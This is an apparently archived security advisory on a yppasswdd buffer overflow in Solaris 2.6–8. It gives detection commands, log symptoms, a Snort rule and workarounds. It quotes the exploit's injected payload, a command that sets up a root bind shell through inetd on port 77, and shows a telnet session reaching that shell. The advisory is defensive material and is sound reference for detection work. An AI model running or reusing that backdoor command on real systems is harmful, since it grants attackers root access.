COMMAND
yppasswd
SYSTEMS AFFECTED
Solaris 2.6, 7, 8
PROBLEM
Jose Nazario and Matt Fearnow posted following. Credits goes to
'metaray' for findings. Please note that this is a preliminary
characterization of the Solaris yppassword buffer overflow. This
version is available to provide at least some information about
it. Please check back over the next few days as the information
is made more complete.
A buffer overflow exploit (for the SPARC architecture) has been
found in the wild which takes advantage of an unchecked buffer in
the 'yppasswd' service on Solaris 2.6, 7 machines. The Intel/x86
version of Solaris 2.6 and 7 may be vulnerable but has not yet
been tested.
To check your system for vulnerability, use "rpcinfo -p | grep
100009" or you can use "ps -ef | grep yppasswdd". If you see
something, your system might be vulnerable to this exploit. Note
that Solaris can provide a "100009" RPC service either via
rpc.yppasswdd, or (if the system is an NIS+ server running in
NIS-Compatibility mode) via rpc.nispasswdd. When the exploit is
run against an rpc.nispasswdd, there's a syslog
rpc.nispasswdd[###]: received yp password update request
from (various binary data followed by a shell command)
and rpc.nispasswdd continues running. Don't know for sure
whether rpc.nispasswdd can be vulnerable to this exploit, but we
saw no vulnerability in any of tests (which were on Solaris 7).
Exploit log message:
May 9 13:56:56 victim-system yppasswdd[191]: yppasswdd: user
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@L
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@P"
`"?-"?-"?-"? ; /bin/sh-c echo 'rje stream tcp nowait root /bin/sh sh
-i'>z;/usr/sbin/inetd -s z;rm z;: does not exist
Symptoms: two inetds running:
victim-system:# ps -ef | grep inetd
root 209 1 0 Apr 30 ? 0:18 /usr/sbin/inetd -s -t
root 8297 1 0 13:56:56 ? 0:00 /usr/sbin/inetd -s z
Effect: root shell on port 77/TCP
she-ra:$ telnet victim-system rje
Trying 192.168.10.5...
Connected to victim-system.example.com.
Escape character is '^]'.
#
While running the code against a "non vulnerable" Solaris system,
Snort picks up the following:
May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111
May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111
May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111
The following is the snort rule from whitehats, that picked this
up:
alert UDP $EXTERNAL any -> $INTERNAL 111 (msg:
"IDS19/portmap-request-autofsd"; rpc: 10099,*,*;)
The publicly available exploit titled "rpc.yppasswdd SPARC remote
r000t mray/metaray 04/01" also can be used for remote root
compromise of Solaris 8 systems.
SOLUTION
The best solution is to firewall your boxe(s) that are running
NIS from the internet. However this will not stop the insider
attack.
Sun has not release an official patch for this yet. A workaround
1) would be to turn off yppasswdd. This is around line 133 or so
in /usr/lib/netsvc/yp/ypstart. Just comment it out. The hack
doesn't appear to work if yppassword is disabled with NIS still
running. Please note in doing this, yppassword is not running
and users cannot change their password.
Another work around 2) is if you still need to run yppassword is
to do the following:
set noexec_user_stack = 1
set noexec_user_stack_log = 1
in /etc/system (after a reboot of course)
Of course a different exploit could work around that but hopefully
this will permit people to use yppasswd until a patch is
forthcoming. This step has not been tested yet.
Kukuk's rpc.yppasswdd builds without a great deal of wrestling on
Solaris 2.6. There was one undef function, probably svc_getcaller
but it's only used in a log message, so it's easy to just
eliminate. This could conceivably be a more complete temporary
solution than setting up noexec_user_stack (though both might be
best).